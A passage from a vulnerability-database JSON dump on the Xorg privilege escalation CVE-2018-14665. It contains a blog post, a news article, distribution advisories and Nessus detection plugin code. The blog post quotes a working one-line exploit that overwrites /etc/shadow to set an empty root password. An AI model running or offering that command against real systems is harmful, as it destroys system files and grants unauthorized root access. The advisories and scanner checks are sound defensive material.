fix it.\n\n\n\nVulnerability is also a specific bug that can lead to some security issues. Or at least it is declared. \n\n### Is this particular bug a Vulnerability or not?\n\nHere is also a mind game. How can we say if these particular bug is a vulnerability or not? Well, we can say, that if Confidentiality, Availability or Integrity are affected, it is a vulnerability. For some cases, like my examples of [Vulnerable Web-Applications](<https://avleonov.com/2018/11/29/making-vulnerable-web-applications-xxs-rce-sql-injection-and-stored-xss-buffer-overflow/>), it's obvious that those bugs are in fact vulnerabilities. But it's not always like this.\n\n#### Should the application data be stored in encrypted form?\n\nFor example, in October of last year there was a news that Telegram Messenger stores data on a device in unencrypted SQLite database: \n\n> While it's somewhat difficult to sift through (write some capable python scripts?) - similar to the issue with Signal - [@telegram](<https://twitter.com/telegram?ref_src=twsrc%5Etfw>) stores your messages in an unencrypted SQLite database. At least I didn't have to go through the effort to find the key this time :)) [pic.twitter.com/gTRpSKVQAM](<https://t.co/gTRpSKVQAM>)\n> \n> -- Nathaniel Suchy (@nathanielrsuchy) [October 30, 2018](<https://twitter.com/nathanielrsuchy/status/1057111749671993344?ref_src=twsrc%5Etfw>)\n\nBut should each application store it's data in encrypted form? Telegram CEO, Pavel Durov, [released a statement](<https://t.me/durov_russia/12>) (rus) that it was NOT a vulnerability: \"If I had access to Your computer, I would be able to read Your messages\". And he may be right or may be not, depends on your position.\n\n#### Vulnerability or default misconfiguration?\n\nAnother vulnerability that was discovered last October. Unprivileged Linux user could add arbitrary string to X server logs and redirect these logs to /etc/shadows file. Thus, it was possible to change root password.\n\n> [#CVE](<https://twitter.com/hashtag/CVE?src=hash&ref_src=twsrc%5Etfw>)-2018-14665 - a LPE exploit via <https://t.co/eax3fvaAjE> fits in a tweet \n \ncd /etc; Xorg -fp \"root::16431:0:99999:7:::\" -logfile shadow :1;su \n \nOverwrite shadow (or any) file on most Linux, get root privileges. *BSD and any other Xorg desktop also affected.\n> \n> -- Hacker Fantastic (@hackerfantastic) [October 25, 2018](<https://twitter.com/hackerfantastic/status/1055517801224396800?ref_src=twsrc%5Etfw>)\n\nI tried and it actually worked:\n\n> Lol. It works.  Tweetable Exploit by [@hackerfantastic](<https://twitter.com/hackerfantastic?ref_src=twsrc%5Etfw>) for <https://t.co/f6XXfwufVX> Server Local Privilege Escalation (CVE-2018-14665). It fills /etc/shadow with trash, but leaves one correctly interpreted line setting empty password for root. [pic.twitter.com/fkEMPCyxkt](<https://t.co/fkEMPCyxkt>)\n> \n> -- Alexander Leonov (@leonov_av) [October 26, 2018](<https://twitter.com/leonov_av/status/1055871303889104897?ref_src=twsrc%5Etfw>)\n\nOf course, it was only possible because the X server was installed with the [setuid bit](<https://en.wikipedia.org/wiki/Setuid>) set by default. So, was it a _vulnerability of X server_, _default misconfiguration_ of a Linux distro or maybe even just a _feature_? It also depends on your point of view. But any way, an attacker still could exploit it.\n\n#### Vulnerabilities exploitable in very specific conditions\n\nThe previous two examples were obviously exploitable, but it's not the fact that they were, strictly speaking, software vulnerabilities. How about issues that certainly looks like vulnerabilities, but it's not the fact that they are actually exploitable? It's very often situation with cryptography issues, with SSL especially.\n\nFor example vulnerabilities of 64-bit block ciphers exploitable through [sweet32](<https://sweet32.info/>) attack. You might face it during your perimeter [PCI ASV](<https://avleonov.com/2017/01/06/who-wants-to-be-a-pci-asv/>) scans and will have to deal with it to get a certificate. The problem with this attack is that it needs 32 GB of traffic to decrypt only one session. The researchers say that \"is easily reached in practice\", but actually I don't think so. Most services don't operate with such amounts of traffic and the session will expire much faster. So, it will be also up to you to decide if this vulnerability is real or not.\n\n### In conclusion\n\n> Beauty is in the eye of the beholder\n\nAnd vulnerability in the eye of the analyst. Software vendors and vulnerability researchers can argue as long as they want about the terms, criticality, who is responsible and who should fix it. But the final decision whether we are dealing with something dangerous or it's some kind of nonsense makes the security analyst of a particular organization. This analyst also decides what to do next: how to actually fix the vulnerability or what workarounds can be used.\n\n", "modified": "2019-01-28T09:41:51", "published": "2019-01-28T09:41:51", "id": "AVLEONOV:1FF4C326FCF56EF1AA19C766216E191C", "href": "http://feedproxy.google.com/~r/avleonov/~3/s2cjymSyzq8/", "type": "avleonov", "title": "What is a vulnerability and what is not?", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2018-10-26T14:30:35", "bulletinFamily": "info", "cvelist": ["CVE-2018-14665"], "description": "[](<https://1.bp.blogspot.com/-mSqKIRrtUm8/W9Mcsv-4AuI/AAAAAAAAydg/gsZo9RVd1-sLQfPJkwVBDUdrQRuw8SFggCLcBGAs/s728-e100/privilege-escalation-linux.jpg>)\n\nAn Indian security researcher has discovered a highly critical flaw in **X.Org Server **package that impacts OpenBSD and most Linux distributions, including Debian, Ubuntu, CentOS, Red Hat, and Fedora. \n \nXorg X server is a popular open-source implementation of the X11 system (display server) that offers a graphical environment to a wider range of hardware and OS platforms. It serves as an intermediary between client and user applications to manage graphical displays. \n \nAccording to a [blog post](<https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html>) published by software security engineer **Narendra Shinde**, Xorg X server doesn't correctly handle and validate arguments for at least two command-line parameters, allowing a low-privileged user to execute malicious code and overwrite any file\u2014including files owned by privileged users like root. \n\n\n \nThe flaw, tracked as **CVE-2018-14665**, was introduced in X.Org server 1.19.0 package that remained undetected for almost two years and could have been exploited by a local attacker on the terminal or via SSH to elevate their privileges on a target system. \n \nThe two vulnerable parameters in question are: \n\n\n * **-modulepath**: to set a directory path to search for Xorg server modules,\n * **-logfile**: to set a new log file for the Xorg server, instead of using the default log file that is located at /var/log/Xorg.n.log on most platforms.\n\n> \"When the X server is running with elevated privileges (i.e., when Xorg is installed with the setuid bit set and started by a non-root user).\" the Xorg [advisory](<https://lists.x.org/archives/xorg-announce/2018-October/002927.html>) says. \"The -modulepath argument can be used to specify an insecure path to modules that are going to be loaded in the X server, allowing to execute unprivileged code in the privileged process.\"\n\n> \"An incorrect permission check for -modulepath and -logfile options when starting Xorg X server allows unprivileged users with the ability to log in to the system via physical console to escalate their privileges and run arbitrary code under root privileges.\" [Red Hat](<https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-14665>) advisory says.\n\n \nSecurity researcher Matthew Hickey shared an easy to execute [proof-of-concept](<https://twitter.com/hackerfantastic/status/1055517801224396800>) exploit code earlier today on Twitter, [saying](<https://twitter.com/hackerfantastic/status/1055568290112831490>) \"An attacker can literally take over impacted systems with 3 commands or less.\" \n\n\n[](<https://1.bp.blogspot.com/-WETt9lCeGfw/W9MbrDjT5DI/AAAAAAAAydY/isgjD5d5rjUDoFy3i2gUj0cPu9tFNyPzQCLcBGAs/s728-e100/privilege-escalation-linux.jpg>)\n\n \nThe X.Org foundation has now released X.Org Server version 1.20.3 with security patches to address the issue. \n \nPopular distributions like [OpenBSD](<https://ftp.openbsd.org/pub/OpenBSD/patches/6.4/common/001_xserver.patch.sig>), [Debian](<https://security-tracker.debian.org/tracker/CVE-2018-14665>), [Ubuntu](<https://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-14665.html>), CentOS, Red Hat, and Fedora have published their advisories to confirm the issue and working on the patch updates. \n\n\nHave something to say about this article? Comment below or share it with us on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter](<https://twitter.com/thehackersnews>) or our [LinkedIn Group](<https://www.linkedin.com/company/the-hacker-news/>).\n", "modified": "2018-10-26T13:59:32", "published": "2018-10-26T13:58:00", "id": "THN:8589C696FD99566AD522DE3118ECE8B9", "href": "https://thehackernews.com/2018/10/privilege-escalation-linux.html", "type": "thn", "title": "New Privilege Escalation Flaw Affects Most Linux Distributions", "cvss": {"score": 0.0, "vector": "NONE"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:39:38", "bulletinFamily": "unix", "cvelist": ["CVE-2018-14665"], "description": "[1.20.1-5.1]\n- CVE-2018-14665: Disable -logfile and -modulepath when running with elevated\n privileges\n[1.20.1-5]\n- Call LeaveVT from xf86CrtcCloseScreen\n[1.20.1-4]\n- Hide the modesetting driver's atomic ioctl support behind Option 'Atomic'", "edition": 4, "modified": "2018-11-07T00:00:00", "published": "2018-11-07T00:00:00", "id": "ELSA-2018-3410", "href": "http://linux.oracle.com/errata/ELSA-2018-3410.html", "title": "xorg-x11-server security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-14T08:35:37", "bulletinFamily": "unix", "cvelist": ["CVE-2018-14599", "CVE-2018-14598", "CVE-2018-15862", "CVE-2018-15859", "CVE-2018-14665", "CVE-2018-15861", "CVE-2018-15854", "CVE-2018-15863", "CVE-2018-14600", "CVE-2018-15857", "CVE-2018-15855", "CVE-2018-15853", "CVE-2018-15864", "CVE-2018-15856"], "description": "gdm\n[3.28.2-16]\n- Dont bring up login screen if background session gets killed\n Related: #1680120\n[3.28.2-15]\n- sync AllowMultipleSessionsPerUser patch from 7.6 branch\n Resolves: #1664353\n- Create dconf dirs by default\n Resolves: #1664284\n[3.28.2-14]\n- Fix unlock on XDMCP sessions\n Resolves: #1693060\n[3.28.2-13]\n- Fix login on s390\n Resolves: #1680060\nlibX11\n[1.6.7-2]\n- Restore the less-alarming server-disconnect message\n[1.6.7-1]\n- libX11 1.6.7\n[1.6.5-3]\n- Make the server-disconnect message less alarming\nlibxkbcommon\n[0.7.1-3]\n- Actually apply the patch files\n[0.7.1-2]\n- Fixes for\n CVE-2018-15864, CVE-2018-15863, CVE-2018-15862, CVE-2018-15861,\n CVE-2018-15859 CVE-2018-15857, CVE-2018-15856, CVE-2018-15855,\n CVE-2018-15854, CVE-2018-15853\nmesa-libGLw\n[8.0.0-5]\n- Fix external API symbol visibility\nxorg-x11-drv-ati\n[19.0.1-2]\n- Avoid breakage on Xserver reset (#1674474)\n[19.0.1-1]\n- ati 19.0.1\nxorg-x11-drv-vesa\n[2.4.0-3]\n- Refuse to run on UEFI framebuffers for v3.10 kernels too\n[2.4.0-2]\n- Refuse to run on UEFI framebuffers\nxorg-x11-drv-wacom\n[0.36.1-3]\n- Ratelimit the bug message warnings (#1642197)\n[0.36.1-2]\n- Fix Cintiq 27QHD error message on proximity in (#1642197)\n[0.36.1-1.1]\n- Rebuild for xserver 1.20\nxorg-x11-server\n[1.20.4-7]\n- Fix a segfault with non-PCI platform devices (and other cases)\n[1.20.4-6]\n- Stop VT switching when inactive server dies\n Resolves: #1680120\n[1.20.4-5]\n- Fix a crash in RRProviderAutoConfigGpuScreen\n[1.20.4-3]\n- Backport fix for 1612924 - enabled monitors\n[1.20.4-2]\n- Dont reset last.valuators on slave device switch (#1640207)\n[1.20.4-1]\n- xserver 1.20.4\n[1.20.1-7]\n- Sync platform probe patch with upstream\n[1.20.1-6]\n- Move LeaveVT after resetting randr pointers in xf86CrtcCloseScreen\n[1.20.1-5.1]\n- CVE-2018-14665: Disable -logfile and -modulepath when running with elevated\n privileges", "edition": 1, "modified": "2019-08-13T00:00:00", "published": "2019-08-13T00:00:00", "id": "ELSA-2019-2079", "href": "http://linux.oracle.com/errata/ELSA-2019-2079.html", "title": "Xorg security and bug fix update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "archlinux": [{"lastseen": "2020-09-22T18:36:41", "bulletinFamily": "unix", "cvelist": ["CVE-2018-14665"], "description": "Arch Linux Security Advisory ASA-201810-15\n==========================================\n\nSeverity: High\nDate : 2018-10-29\nCVE-ID : CVE-2018-14665\nPackage : xorg-server\nType : privilege escalation\nRemote : Yes\nLink : https://security.archlinux.org/AVG-788\n\nSummary\n=======\n\nThe package xorg-server before version 1.20.3-1 is vulnerable to\nprivilege escalation.\n\nResolution\n==========\n\nUpgrade to 1.20.3-1.\n\n# pacman -Syu \"xorg-server>=1.20.3-1\"\n\nThe problem has been fixed upstream in version 1.20.3.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nIncorrect command-line parameter validation in the Xorg X server can\nlead to privilege elevation and/or arbitrary files overwrite, when the\nX server is installed with the setuid bit set and unprivileged users\nhave the ability to log in to the system via physical console.\n\nThe -modulepath argument can be used to specify an insecure path to\nmodules that are going to be loaded in the X server, allowing to\nexecute unprivileged code in the privileged process.\n\nThe -logfile argument can be used to overwrite arbitrary files in the\nfile system, due to incorrect checks in the parsing of the option.\n\nImpact\n======\n\nA local attacker can elevate privileges to root by passing crafted\nparameters to the Xorg X server.\n\nReferences\n==========\n\nhttps://gitlab.freedesktop.org/xorg/xserver/commit/50c0cf885a6e91c0ea71fb49fa8f1b7c86fe330e\nhttps://gitlab.freedesktop.org/xorg/xserver/commit/032b1d79b7\nhttps://www.openwall.com/lists/oss-security/2018/10/25/1\nhttps://security.archlinux.org/CVE-2018-14665", "modified": "2018-10-29T00:00:00", "published": "2018-10-29T00:00:00", "id": "ASA-201810-15", "href": "https://security.archlinux.org/ASA-201810-15", "type": "archlinux", "title": "[ASA-201810-15] xorg-server: privilege escalation", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2020-09-18T10:57:31", "description": "Narendra Shinde discovered that the X.Org X server incorrectly handled\ncertain command line parameters when running as root with the legacy\nwrapper. When certain graphics drivers are being used, a local\nattacker could possibly use this issue to overwrite arbitrary files\nand escalate privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 20, "cvss3": {"score": 6.6, "vector": "AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-10-29T00:00:00", "title": "Ubuntu 16.04 LTS / 18.04 LTS / 18.10 : X.Org X server vulnerability (USN-3802-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14665"], "modified": "2018-10-29T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:18.10", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:18.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:xserver-xorg-core-hwe-16.04", "p-cpe:/a:canonical:ubuntu_linux:xserver-xorg-core"], "id": "UBUNTU_USN-3802-1.NASL", "href": "https://www.tenable.com/plugins/nessus/118492", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3802-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118492);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/17\");\n\n script_cve_id(\"CVE-2018-14665\");\n script_xref(name:\"USN\", value:\"3802-1\");\n script_xref(name:\"IAVB\", value:\"2018-B-0140\");\n\n script_name(english:\"Ubuntu 16.04 LTS / 18.04 LTS / 18.10 : X.Org X server vulnerability (USN-3802-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Narendra Shinde discovered that the X.Org X server incorrectly handled\ncertain command line parameters when running as root with the legacy\nwrapper. When certain graphics drivers are being used, a local\nattacker could possibly use this issue to overwrite arbitrary files\nand escalate privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3802-1/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected xserver-xorg-core and / or\nxserver-xorg-core-hwe-16.04 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Xorg X11 Server SUID privilege escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:xserver-xorg-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:xserver-xorg-core-hwe-16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/29\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018-2020 Canonical, Inc. / NASL script (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04|18\\.04|18\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04 / 18.04 / 18.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"xserver-xorg-core-hwe-16.04\", pkgver:\"2:1.19.6-1ubuntu4.1~16.04.2\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"xserver-xorg-core\", pkgver:\"2:1.19.6-1ubuntu4.2\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"xserver-xorg-core\", pkgver:\"2:1.20.1-3ubuntu2.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xserver-xorg-core / xserver-xorg-core-hwe-16.04\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T01:15:31", "description": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14665\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14665 X.Org X\nserver could allow a remote authenticated attacker to gain elevated\nprivileges on the system, caused by improper validation of command\nline parameters. An attacker could exploit this vulnerability using\nthe -modulepath argument or the -logfile argument to overwrite\narbitrary files and execute unprivileged code on the system.", "edition": 20, "published": "2018-12-13T00:00:00", "title": "AIX 7.2 TL 2 : xorg (IJ11549)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14665"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:ibm:aix:7.2"], "id": "AIX_IJ11549.NASL", "href": "https://www.tenable.com/plugins/nessus/119631", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory xorg_advisory3.asc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119631);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/04/25 9:51:46\");\n\n script_cve_id(\"CVE-2018-14665\");\n\n script_name(english:\"AIX 7.2 TL 2 : xorg (IJ11549)\");\n script_summary(english:\"Check for APAR IJ11549\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14665\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14665 X.Org X\nserver could allow a remote authenticated attacker to gain elevated\nprivileges on the system, caused by improper validation of command\nline parameters. An attacker could exploit this vulnerability using\nthe -modulepath argument or the -logfile argument to overwrite\narbitrary files and execute unprivileged code on the system.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/xorg_advisory3.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Xorg X11 Server SUID logfile Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:7.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/12/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/12/11\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/12/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"7.2\", ml:\"02\", patch:\"IJ11549s0a\", package:\"X11.base.rte\", minfilesetver:\"7.2.2.0\", maxfilesetver:\"7.2.2.0\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:aix_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:15:20", "description": "An update for xorg-x11-server is now available for Red Hat Enterprise\nLinux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nX.Org is an open source implementation of the X Window System. It\nprovides the basic low-level functionality that full-fledged graphical\nuser interfaces are designed upon.\n\nSecurity Fix(es) :\n\n* xorg-x11-server: Incorrect permission check in Xorg X server allows\nfor privilege escalation (CVE-2018-14665)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, and other related information, refer to the CVE page(s)\nlisted in the References section.\n\nRed Hat would like to thank Narendra Shinde for reporting this issue.", "edition": 24, "cvss3": {"score": 6.6, "vector": "AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-10-31T00:00:00", "title": "RHEL 7 : xorg-x11-server (RHSA-2018:3410)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14665"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-devel", "p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-source", "p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-Xwayland", "p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-common", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-Xephyr", "p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-Xorg", "p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-debuginfo", "cpe:/o:redhat:enterprise_linux:7.6", "p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-Xnest", "p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-Xvfb", "p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-Xdmx"], "id": "REDHAT-RHSA-2018-3410.NASL", "href": "https://www.tenable.com/plugins/nessus/118557", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2018:3410. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118557);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/10/24 15:35:46\");\n\n script_cve_id(\"CVE-2018-14665\");\n script_xref(name:\"RHSA\", value:\"2018:3410\");\n script_xref(name:\"IAVB\", value:\"2018-B-0140\");\n\n script_name(english:\"RHEL 7 : xorg-x11-server (RHSA-2018:3410)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for xorg-x11-server is now available for Red Hat Enterprise\nLinux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nX.Org is an open source implementation of the X Window System. It\nprovides the basic low-level functionality that full-fledged graphical\nuser interfaces are designed upon.\n\nSecurity Fix(es) :\n\n* xorg-x11-server: Incorrect permission check in Xorg X server allows\nfor privilege escalation (CVE-2018-14665)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, and other related information, refer to the CVE page(s)\nlisted in the References section.\n\nRed Hat would like to thank Narendra Shinde for reporting this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2018:3410\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-14665\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Xorg X11 Server SUID privilege escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-Xdmx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-Xephyr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-Xnest\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-Xorg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-Xvfb\");\n script_set_attribute(attribute:\"cpe\", 